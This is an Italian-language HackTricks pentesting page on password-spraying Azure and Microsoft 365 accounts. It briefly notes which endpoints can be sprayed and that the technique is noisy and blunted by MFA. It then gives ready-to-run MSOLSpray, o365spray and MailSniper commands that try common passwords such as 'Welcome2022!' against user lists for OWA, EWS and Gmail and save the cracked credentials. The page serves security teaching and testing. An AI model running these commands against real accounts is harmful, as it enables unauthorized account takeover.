Files
hacktricks-cloud/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md

1.4 KiB

Az - Password Spraying

{{#include ../../../banners/hacktricks-training.md}}

Password Spray

In Azure questo può essere fatto contro diversi endpoint API come Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, ecc.

Tuttavia, nota che questa tecnica è molto rumorosa e il Blue Team può catturarla facilmente. Inoltre, la complessità della password forzata e l'uso di MFA possono rendere questa tecnica piuttosto inutile.

Puoi eseguire un attacco di password spray con MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

O con o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

O con MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

{{#include ../../../banners/hacktricks-training.md}}